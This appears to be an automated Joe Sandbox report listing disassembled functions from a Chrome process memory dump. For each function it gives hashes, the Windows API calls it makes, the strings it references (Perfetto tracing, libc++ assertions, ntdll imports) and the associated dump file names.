Instruction ID: 55cba42334e159a661c9f8920cca5382bd9e1d84059ee5be18e96a22d920d36f
Opcode Fuzzy Hash: 263630f1d0c64731c2a633dcdcc5e80b77f3adc82f8f6008f0bd82b076963928
Instruction Fuzzy Hash: 52F1F372E08A4B86EB188B15D41437977A1EFA4BD4F444635EF4E87394EE7CE449E320

Function 00007FF63EDBC440 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 237COMMON

Download Yara Rule

APIs

ReleaseSRWLockExclusive.KERNEL32 ref: 00007FF63EDBC5CF
ReleaseSRWLockExclusive.KERNEL32 ref: 00007FF63EDBC62D

Strings

..\..\third_party\perfetto\src\tracing\core\shared_memory_arbiter_impl.cc, xrefs: 00007FF63EDBC717, 00007FF63EDBC765
%s (errno: %d, %s), xrefs: 00007FF63EDBC738
Shared memory buffer max stall count exceeded; possible deadlock (errno: %d, %s), xrefs: 00007FF63EDBC77A
PERFETTO_CHECK(was_always_bound_), xrefs: 00007FF63EDBC72C

Memory Dump Source

Source File: 00000009.00000002.2301419267.00007FF63EDB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF63EDB0000, based on PE: true

Associated: 00000009.00000002.2301359970.00007FF63EDB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301567835.00007FF63EF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301625864.00007FF63EFE1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301645128.00007FF63EFE2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301645128.00007FF63EFEF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301692165.00007FF63EFF0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301728968.00007FF63EFFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301762596.00007FF63F00F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301790033.00007FF63F010000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301815948.00007FF63F011000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff63edb0000_chrome.jbxd

Similarity

API ID: ExclusiveLockRelease
String ID: %s (errno: %d, %s)$..\..\third_party\perfetto\src\tracing\core\shared_memory_arbiter_impl.cc$PERFETTO_CHECK(was_always_bound_)$Shared memory buffer max stall count exceeded; possible deadlock (errno: %d, %s)
API String ID: 1766480654-3492137015
Opcode ID: 01dae235d2586b96265fa09b20215b0a3ec7e829b0cd15907dac78067358da52
Instruction ID: 96f0f1542c194a41e7f767f09dacdf0e273398e24445f4575a4e665df730ddc3
Opcode Fuzzy Hash: 01dae235d2586b96265fa09b20215b0a3ec7e829b0cd15907dac78067358da52
Instruction Fuzzy Hash: 43A1B436A08A4686EB24CF15E44037A73A0FB64784F504235EB4E87BA4EFBDE559D710

Function 00007FF63EE62280 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 314COMMON

Download Yara Rule

APIs

TryAcquireSRWLockExclusive.KERNEL32 ref: 00007FF63EE62410
ReleaseSRWLockExclusive.KERNEL32 ref: 00007FF63EE624F4

Strings

UUUUUUUU, xrefs: 00007FF63EE62455
33333333, xrefs: 00007FF63EE62468

Memory Dump Source

Source File: 00000009.00000002.2301419267.00007FF63EDB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF63EDB0000, based on PE: true

Associated: 00000009.00000002.2301359970.00007FF63EDB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301567835.00007FF63EF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301625864.00007FF63EFE1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301645128.00007FF63EFE2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301645128.00007FF63EFEF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301692165.00007FF63EFF0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301728968.00007FF63EFFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301762596.00007FF63F00F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301790033.00007FF63F010000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301815948.00007FF63F011000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff63edb0000_chrome.jbxd

Similarity

API ID: ExclusiveLock$AcquireRelease
String ID: 33333333$UUUUUUUU
API String ID: 17069307-3483174168
Opcode ID: 455277ef087dcb940d0442d43a2d3a2e45d16e912bc6a0374c9e41bcadddd422
Instruction ID: 33b05e1cea5e6a0aa7d2eedd3be8de9cd05b65ef5313357fa106b208098484db
Opcode Fuzzy Hash: 455277ef087dcb940d0442d43a2d3a2e45d16e912bc6a0374c9e41bcadddd422
Instruction Fuzzy Hash: 2CD1E232F1D64681EB248B15E0507796391AFB8B84F548135FF4D87BA4DFACF84AA720

Function 00007FF63EE92980 Relevance: 7.8, APIs: 5, Instructions: 337memoryCOMMON

Download Yara Rule

APIs

TryAcquireSRWLockExclusive.KERNEL32 ref: 00007FF63EE929C6
TryAcquireSRWLockExclusive.KERNEL32(?), ref: 00007FF63EE92E1C
ReleaseSRWLockExclusive.KERNEL32 ref: 00007FF63EE92E3F
ReleaseSRWLockExclusive.KERNEL32(?), ref: 00007FF63EE92E5F
TlsAlloc.KERNEL32 ref: 00007FF63EE92EAD

Memory Dump Source

Source File: 00000009.00000002.2301419267.00007FF63EDB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF63EDB0000, based on PE: true

Associated: 00000009.00000002.2301359970.00007FF63EDB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301567835.00007FF63EF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301625864.00007FF63EFE1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301645128.00007FF63EFE2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301645128.00007FF63EFEF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301692165.00007FF63EFF0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301728968.00007FF63EFFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301762596.00007FF63F00F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301790033.00007FF63F010000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301815948.00007FF63F011000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff63edb0000_chrome.jbxd

Similarity

API ID: ExclusiveLock$AcquireRelease$Alloc
String ID:
API String ID: 3005806778-0
Opcode ID: da041680a442123005105c18684c40a3959b796291f565dc2b972f6f2d3b5334
Instruction ID: 9d7805348ff1eead8e41e5391da8aea4c69c52700bd63fad7751a3dc558d6cd9
Opcode Fuzzy Hash: da041680a442123005105c18684c40a3959b796291f565dc2b972f6f2d3b5334
Instruction Fuzzy Hash: 29E1F432A09B8585EB66CB21E4043A977E4FB69384F458335FA9D83790DF7CA19AD310

Function 00007FF63EDBD9E0 Relevance: 4.7, APIs: 3, Instructions: 172COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2301419267.00007FF63EDB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF63EDB0000, based on PE: true

Associated: 00000009.00000002.2301359970.00007FF63EDB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301567835.00007FF63EF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301625864.00007FF63EFE1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301645128.00007FF63EFE2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301645128.00007FF63EFEF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301692165.00007FF63EFF0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301728968.00007FF63EFFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301762596.00007FF63F00F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301790033.00007FF63F010000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301815948.00007FF63F011000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff63edb0000_chrome.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13ef6364d8cfb2284bcce6f492a9de6b0fbb0e15eda3bbd8dbef0c7e3a22503b
Instruction ID: 3a956f170b01a64651f4d8f860c20a3000fcebf500e849336d8199eb7ee620dc
Opcode Fuzzy Hash: 13ef6364d8cfb2284bcce6f492a9de6b0fbb0e15eda3bbd8dbef0c7e3a22503b
Instruction Fuzzy Hash: 89617062E0D547D5FB508B15E8402792390EFB4BA4F544335EA2D837E8EF6DB44AE320

Function 00007FF63EDF5470 Relevance: 57.9, APIs: 1, Strings: 32, Instructions: 147COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF63EDF54B1

Strings

NtProtectVirtualMemory, xrefs: 00007FF63EDF5590
wcslen, xrefs: 00007FF63EDF5748
NtOpenThread, xrefs: 00007FF63EDF5564
NtQueryFullAttributesFile, xrefs: 00007FF63EDF55BC
NtCreateSection, xrefs: 00007FF63EDF54F6
NtQueryObject, xrefs: 00007FF63EDF55E8
NtQueryAttributesFile, xrefs: 00007FF63EDF55A6
strlen, xrefs: 00007FF63EDF5732
NtCreateFile, xrefs: 00007FF63EDF54E0
NtClose, xrefs: 00007FF63EDF550C
NtOpenProcessTokenEx, xrefs: 00007FF63EDF557A
NtDuplicateObject, xrefs: 00007FF63EDF5522
NtQueryInformationProcess, xrefs: 00007FF63EDF55D2
NtMapViewOfSection, xrefs: 00007FF63EDF554E
NtQueryVirtualMemory, xrefs: 00007FF63EDF5614
NtUnmapViewOfSection, xrefs: 00007FF63EDF5656
NtWaitForSingleObject, xrefs: 00007FF63EDF566C
NtQuerySection, xrefs: 00007FF63EDF55FE
NtAllocateVirtualMemory, xrefs: 00007FF63EDF54CA
_strnicmp, xrefs: 00007FF63EDF571C
NtSignalAndWaitForSingleObject, xrefs: 00007FF63EDF5640
NtFreeVirtualMemory, xrefs: 00007FF63EDF5538
NtSetInformationFile, xrefs: 00007FF63EDF562A
RtlAnsiStringToUnicodeString, xrefs: 00007FF63EDF5698
RtlCreateHeap, xrefs: 00007FF63EDF56C4
RtlCompareUnicodeString, xrefs: 00007FF63EDF56AE
ntdll.dll, xrefs: 00007FF63EDF54AA
memcpy, xrefs: 00007FF63EDF575E
RtlNtStatusToDosError, xrefs: 00007FF63EDF5706
RtlAllocateHeap, xrefs: 00007FF63EDF5682
RtlFreeHeap, xrefs: 00007FF63EDF56F0
RtlDestroyHeap, xrefs: 00007FF63EDF56DA

Memory Dump Source

Source File: 00000009.00000002.2301419267.00007FF63EDB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF63EDB0000, based on PE: true

Associated: 00000009.00000002.2301359970.00007FF63EDB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301567835.00007FF63EF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301625864.00007FF63EFE1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301645128.00007FF63EFE2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301645128.00007FF63EFEF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301692165.00007FF63EFF0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301728968.00007FF63EFFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301762596.00007FF63F00F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301790033.00007FF63F010000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301815948.00007FF63F011000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff63edb0000_chrome.jbxd

Similarity

API ID: HandleModule
String ID: NtAllocateVirtualMemory$NtClose$NtCreateFile$NtCreateSection$NtDuplicateObject$NtFreeVirtualMemory$NtMapViewOfSection$NtOpenProcessTokenEx$NtOpenThread$NtProtectVirtualMemory$NtQueryAttributesFile$NtQueryFullAttributesFile$NtQueryInformationProcess$NtQueryObject$NtQuerySection$NtQueryVirtualMemory$NtSetInformationFile$NtSignalAndWaitForSingleObject$NtUnmapViewOfSection$NtWaitForSingleObject$RtlAllocateHeap$RtlAnsiStringToUnicodeString$RtlCompareUnicodeString$RtlCreateHeap$RtlDestroyHeap$RtlFreeHeap$RtlNtStatusToDosError$_strnicmp$memcpy$ntdll.dll$strlen$wcslen
API String ID: 4139908857-3460877470
Opcode ID: 4c266f6aa4b8195a5aeb08880579e65771a3c66d3a5a00dd2b8ebfad7b845a20
Instruction ID: 7b0d430751ae58477af38c53de4883ad744f5c279d7d7a75d87e912b72bf066f
Opcode Fuzzy Hash: 4c266f6aa4b8195a5aeb08880579e65771a3c66d3a5a00dd2b8ebfad7b845a20
Instruction Fuzzy Hash: 9D812334E4CE0644FB049B10F8550B63390AFA4B45B505239F46DCB769EFACA60EE3A1

Function 00007FF63EF395B0 Relevance: 26.6, APIs: 2, Strings: 13, Instructions: 339COMMON

Download Yara Rule

APIs

GetStartupInfoW.KERNEL32 ref: 00007FF63EF39707
GetLastError.KERNEL32 ref: 00007FF63EF39A0A

Strings

AttemptToNotifyRunningChrome:Error RemoteHung, xrefs: 00007FF63EF39C20
N, xrefs: 00007FF63EF398E5
source-shortcut, xrefs: 00007FF63EF3973D
AttemptToNotifyRunningChrome:SendMessage, xrefs: 00007FF63EF39BF6
..\..\third_party\libc++\src\include\string_view:267: assertion __s != nullptr failed: null pointer passed to non-null argument of char_traits<...>::length, xrefs: 00007FF63EF39B93
AttemptToNotifyRunningChrome:Error SendFailed, xrefs: 00007FF63EF39A91
..\..\third_party\libc++\src\include\string_view:314: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 00007FF63EF39ABF
AttemptToNotifyRunningChrome:GetWindowThreadProcessId failed, xrefs: 00007FF63EF39B62
AttemptToNotifyRunningChrome:GetCurrentDirectory failed, xrefs: 00007FF63EF39BC9
START, xrefs: 00007FF63EF39769
AttemptToNotifyRunningChrome:Error RemoteDied, xrefs: 00007FF63EF39A85
..\..\third_party\libc++\src\include\string_view:316: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 00007FF63EF39AD2
AttemptToNotifyRunningChrome, xrefs: 00007FF63EF39B0B

Memory Dump Source

Source File: 00000009.00000002.2301419267.00007FF63EDB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF63EDB0000, based on PE: true

Associated: 00000009.00000002.2301359970.00007FF63EDB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301567835.00007FF63EF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301625864.00007FF63EFE1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301645128.00007FF63EFE2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301645128.00007FF63EFEF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301692165.00007FF63EFF0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301728968.00007FF63EFFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301762596.00007FF63F00F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301790033.00007FF63F010000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301815948.00007FF63F011000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff63edb0000_chrome.jbxd

Similarity

API ID: ErrorInfoLastStartup
String ID: N$..\..\third_party\libc++\src\include\string_view:267: assertion __s != nullptr failed: null pointer passed to non-null argument of char_traits<...>::length$..\..\third_party\libc++\src\include\string_view:314: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:316: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr$AttemptToNotifyRunningChrome$AttemptToNotifyRunningChrome:Error RemoteDied$AttemptToNotifyRunningChrome:Error RemoteHung$AttemptToNotifyRunningChrome:Error SendFailed$AttemptToNotifyRunningChrome:GetCurrentDirectory failed$AttemptToNotifyRunningChrome:GetWindowThreadProcessId failed$AttemptToNotifyRunningChrome:SendMessage$START$source-shortcut
API String ID: 2260939616-2789412798
Opcode ID: 053e5e0f4d58a5d61dfde533dafa608743349090563aa6434cf196231c93d85f
Instruction ID: 9ac6a5a3fb9d29512fa13320111592b37c84697cc4ad4ac2bd729818751c92dc
Opcode Fuzzy Hash: 053e5e0f4d58a5d61dfde533dafa608743349090563aa6434cf196231c93d85f
Instruction Fuzzy Hash: C8F14D71A0CB8291EB218B14E8513FA73A0EFA5744F404139EACC87799DFBDE149E761

Function 00007FF63EE81270 Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 283COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF63EE812C2
SetLastError.KERNEL32 ref: 00007FF63EE812CC
SetLastError.KERNEL32 ref: 00007FF63EE812E0
TryAcquireSRWLockExclusive.KERNEL32 ref: 00007FF63EE8139A
ReleaseSRWLockExclusive.KERNEL32 ref: 00007FF63EE813FD
QueryPerformanceCounter.KERNEL32 ref: 00007FF63EE8142E
AcquireSRWLockExclusive.KERNEL32 ref: 00007FF63EE814E1
TryAcquireSRWLockExclusive.KERNEL32 ref: 00007FF63EE815DE
ReleaseSRWLockExclusive.KERNEL32 ref: 00007FF63EE81600

Strings

..\..\third_party\libc++\src\include\optional:801: assertion this->has_value() failed: optional operator* called on a disengaged value, xrefs: 00007FF63EE81668
<, xrefs: 00007FF63EE815CD

Memory Dump Source

Source File: 00000009.00000002.2301419267.00007FF63EDB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF63EDB0000, based on PE: true

Associated: 00000009.00000002.2301359970.00007FF63EDB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301567835.00007FF63EF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301625864.00007FF63EFE1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301645128.00007FF63EFE2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301645128.00007FF63EFEF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301692165.00007FF63EFF0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301728968.00007FF63EFFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301762596.00007FF63F00F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301790033.00007FF63F010000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301815948.00007FF63F011000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff63edb0000_chrome.jbxd

Similarity

API ID: ExclusiveLock$AcquireErrorLast$Release$CounterPerformanceQuery
String ID: ..\..\third_party\libc++\src\include\optional:801: assertion this->has_value() failed: optional operator* called on a disengaged value$<
API String ID: 593636287-161334329
Opcode ID: a56985ed5cd8e9e98d8a70c2b9fb2b47183ff1d268c8f27e9fab4ae96d568509
Instruction ID: c4a629f3478afceffeaad8ca9121eb24c9df02a285e76b33d7f15e84b78045ea
Opcode Fuzzy Hash: a56985ed5cd8e9e98d8a70c2b9fb2b47183ff1d268c8f27e9fab4ae96d568509
Instruction Fuzzy Hash: 5EC1D029A0CA4680EB219B21E51037937A1FF65F80F455236FA4F97795DFBCE089A320

Function 00007FF63EDD5F20 Relevance: 19.5, APIs: 2, Strings: 9, Instructions: 260COMMON

Download Yara Rule

Strings

/prefetch:7, xrefs: 00007FF63EDD621B
database, xrefs: 00007FF63EDD6255
..\..\third_party\libc++\src\include\vector:1411: assertion __n < size() failed: vector[] index out of bounds, xrefs: 00007FF63EDD60A7
..\..\third_party\libc++\src\include\__string\char_traits.h:223: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap, xrefs: 00007FF63EDD60D7
..\..\third_party\libc++\src\include\string_view:314: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 00007FF63EDD6094, 00007FF63EDD6452
kernel32.dll, xrefs: 00007FF63EDD6301
..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at, xrefs: 00007FF63EDD63AE
..\..\third_party\libc++\src\include\string_view:316: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 00007FF63EDD6465
SetUnhandledExceptionFilter, xrefs: 00007FF63EDD6317

Memory Dump Source

Source File: 00000009.00000002.2301419267.00007FF63EDB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF63EDB0000, based on PE: true

Associated: 00000009.00000002.2301359970.00007FF63EDB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301567835.00007FF63EF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301625864.00007FF63EFE1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301645128.00007FF63EFE2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301645128.00007FF63EFEF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301692165.00007FF63EFF0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301728968.00007FF63EFFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301762596.00007FF63F00F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301790033.00007FF63F010000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301815948.00007FF63F011000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff63edb0000_chrome.jbxd

Similarity

API ID:
String ID: ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at$..\..\third_party\libc++\src\include\__string\char_traits.h:223: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap$..\..\third_party\libc++\src\include\string_view:314: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:316: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr$..\..\third_party\libc++\src\include\vector:1411: assertion __n < size() failed: vector[] index out of bounds$/prefetch:7$SetUnhandledExceptionFilter$database$kernel32.dll
API String ID: 0-1004627178
Opcode ID: 4a24a18d1686d049984ec6cbfeb6f3f31f8d95092c89649b73734b787c6ede6d
Instruction ID: cf0db6c6e317942034835d60f232b9575925958947e64b49315fc8919552b65a
Opcode Fuzzy Hash: 4a24a18d1686d049984ec6cbfeb6f3f31f8d95092c89649b73734b787c6ede6d
Instruction Fuzzy Hash: F3C19126E0DB8681EB20DB10E5503BA6760FFA4784F458235FA9C83795DFBCE189D750

Function 00007FF63EEB2480 Relevance: 17.7, APIs: 4, Strings: 6, Instructions: 176threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00007FF63EEB24DF
GetCurrentThreadId.KERNEL32 ref: 00007FF63EEB2504
SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FF63EEB2559
PostQueuedCompletionStatus.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FF63EEB25A4

Strings

Chrome.MessageLoopProblem.MESSAGE_POST_ERROR, xrefs: 00007FF63EEB2626
I, xrefs: 00007FF63EEB2655
WaitableEvent::Signal, xrefs: 00007FF63EEB2743
ScheduleWorkToSelf, xrefs: 00007FF63EEB270A
Chrome.MessageLoopProblem.COMPLETION_POST_ERROR, xrefs: 00007FF63EEB2632
ScheduleWork, xrefs: 00007FF63EEB26D0

Memory Dump Source

Source File: 00000009.00000002.2301419267.00007FF63EDB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF63EDB0000, based on PE: true

Associated: 00000009.00000002.2301359970.00007FF63EDB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301567835.00007FF63EF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301625864.00007FF63EFE1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301645128.00007FF63EFE2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301645128.00007FF63EFEF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301692165.00007FF63EFF0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301728968.00007FF63EFFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301762596.00007FF63F00F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301790033.00007FF63F010000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301815948.00007FF63F011000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff63edb0000_chrome.jbxd

Similarity

API ID: CurrentThread$CompletionEventPostQueuedStatus
String ID: Chrome.MessageLoopProblem.COMPLETION_POST_ERROR$Chrome.MessageLoopProblem.MESSAGE_POST_ERROR$I$ScheduleWork$ScheduleWorkToSelf$WaitableEvent::Signal
API String ID: 3823919964-1721350857
Opcode ID: b5df5b6d8f4de5b14f0895cb04891ef43754d68fdaa75452e19127bb265213a1
Instruction ID: 1119360b667bd43824828239fd3acc269b17eef831e1c5b7ccbdaa869398d7f1
Opcode Fuzzy Hash: b5df5b6d8f4de5b14f0895cb04891ef43754d68fdaa75452e19127bb265213a1
Instruction Fuzzy Hash: 2A81A421E0DB4381EB218B15F4503BA77A0EF69784F504036EA8D877A5DFACE54EE760

Function 00007FF63EDB1000 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 107threadlibraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF63EDB11F0: GetCurrentThreadId.KERNEL32 ref: 00007FF63EDB1215
Part of subcall function 00007FF63EDB11F0: TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,00007FF63EDB102C), ref: 00007FF63EDB1220

GetCurrentThread.KERNEL32 ref: 00007FF63EDB10A9
IsDebuggerPresent.KERNEL32 ref: 00007FF63EDB10CD
GetModuleHandleW.KERNEL32 ref: 00007FF63EDB1104
GetProcAddress.KERNEL32 ref: 00007FF63EDB1114
GetCurrentThreadId.KERNEL32 ref: 00007FF63EDB1196
RaiseException.KERNEL32 ref: 00007FF63EDB11CA

Strings

..\..\third_party\libc++\src\include\string_view:314: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 00007FF63EDB116E
SetThreadDescription, xrefs: 00007FF63EDB110A
..\..\third_party\libc++\src\include\string_view:316: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 00007FF63EDB1181
Kernel32.dll, xrefs: 00007FF63EDB10FD

Memory Dump Source

Source File: 00000009.00000002.2301419267.00007FF63EDB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF63EDB0000, based on PE: true

Associated: 00000009.00000002.2301359970.00007FF63EDB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301567835.00007FF63EF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301625864.00007FF63EFE1000.00000004.00000001.01000000.0000000A.sdmpDownload File
